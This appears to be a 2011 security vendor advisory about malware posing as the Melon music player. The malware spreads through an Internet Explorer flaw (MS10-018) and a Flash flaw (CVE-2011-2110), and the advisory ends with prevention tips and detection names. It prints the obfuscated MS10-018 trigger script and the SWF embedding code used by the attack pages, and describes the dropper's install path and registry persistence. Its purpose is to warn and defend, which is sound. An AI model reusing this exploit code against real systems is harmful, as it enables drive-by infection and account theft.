12345

6/30/2011

[Warning] A malicious file masqueraded as a Melon player is spreading.

1. Introduction

Recently, malicious file spreading technique using Flash player’s vulnerability trying to download or execute additional malicious file is prevalent.
In case of being infected with this malicious file, various malicious behaviors can be performed in user’s computer unconsciously.
Therefore, user needs special attention about prevalent malicious file to avoid it.



2. Spreading path and symptoms of infection

Masqueraded as a Korean famous music service player, malicious file can be downloaded and installed user’s PC by malicious SWF file using Flash Player Vulnerability (CVE-2011-2110).

The initial spread has begun with inserted Script file such as following URL. And it will perform additionally after checking the version of Internet Explorer and Adobe Flash Player Version.

* Malicious Script for spreading Melon Player’s malicious

- http://(omit)/share/a1.html

* Html, SWF files included malicious Script

This following figure is internal code of a1.html and shows routine about checking version of IE and Flash Player Version and executing SWF file matching.


The following URL is the list to download additional malicious script files.

* Additional malicious Script file downloadable URL list

- http://(~~)/share/a1.html
- http://(~~)/share/a2.html (MS10-018 vulnerability)
- http://(~~)/share/a3.html (CVE-2011-2110 vulnerability)

a2.html and a3.html files are containing code, which is using MS10-018 vulnerability and CVE-2011-2110 vulnerability by each.


* Vulnerability of MS10-018 (a2.html)



function sclick()
{
var zmaqwekjsax = document.createElement("B"+"O"+"D"+"Y");
zmaqwekjsax.addBehavior("#"+"d"+"e"+"f"+"a"+"u"+"l"+"t"+"#"+"u"+"s"+"e"+"r"+"Da"+"t"+"a");
document.appendChild(zmaqwekjsax);
try
{
for (i=0;i<10;i++)
{
zmaqwekjsax.setAttribute('s',window);
}
}
catch(e)
{}
window.status+='';
}

* Vulnerability of CVE-2011-2110 (a3.html)



<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="550" height="400" id="test" align="middle">
<param name="movie" value="basic.swf?info=02E6B(~~)B51D3527B7AF28B7394" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="true" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<param name="allowScriptAccess" value="sameDomain" />
<!--[if !IE]>-->
<object type="application/x-shockwave-flash" data="basic.swf?info=02E6B(~~)B7394" width="550" height="400">
<param name="movie" value="basic.swf?info=02E6B(~~)B51D3527B7AF28B7394" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="true" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<param name="allowScriptAccess" value="sameDomain" />


This following figure shows internal code of SWF file including malicious code which can be executable by malicious Script. In addition, it shows Shellcode information (Load library, download malicious file disguised as Melon Player) and decoded screen.



* Adobe Flash Player latest security patch
http://www.adobe.com/go/getflash

* Malicious file masqueraded as Melon Player 3.0

Finally, malicious script and SWF file using vulnerability will download "fatt.txt" file. At a glance, it looks like .TXT file. But after decoding process, it will be converted .EXE file to have an ability to infect..

The following image shows the comparison of preference between masqueraded malicious file and normal Melon Player 3.0’s installation file.
 

Original Melon Player’s installation file has the file name “MelonSetup", which is integrated installation file, therefore it doesn’t contain version information.

If being infected with decoded “fatt.txt”, it will make its clone and try to add register by itself.
  
* Generated file
- C:\WINDOWS\winntp\cr.exe (239,108 bytes)

* Register registry value- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Name : HKLM
- Data : "C:\WINDOWS\winntp\cr.exe"

In addition, if this file is executed, it can perform sending collected information, downloading additional malicious file or working as a backdoor in case of maintaining session connecting status continuously such as following figure.
  

3. How to prevent

As above, in this kind of spreading malicious file for stealing online game account, its various variants are emerging and identified. It spreads itself via famous and various social-commerce sites, therefore; the range of infected can be widened considerably and, a huge financial loss, damage can be followed.

Especially, it's hard to detect being infected or not for general user because this kind of malicious files spread unconsciously. To keep safe from this kind of spreading malicious files that we recommend following tips "Security management tips" for general users.
  
Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) provides diagnosis/treatment function with nProtect Mobile for Android for mobile such as malicious file stated above and runs responding system against various security threats.

Diagnosis name

- Script-JS/W32.Agent.AAD
- Script-JS/W32.Agent.CGF
- Script-JS/W32.Agent.CHI
- Trojan-Exploit/W32.SWFlash.3436
- Trojan-Exploit/W32.SWFlash.3437.B
- Trojan/W32.Buzus.239108
- Trojan/W32.Buzus.239108
 

1 comment: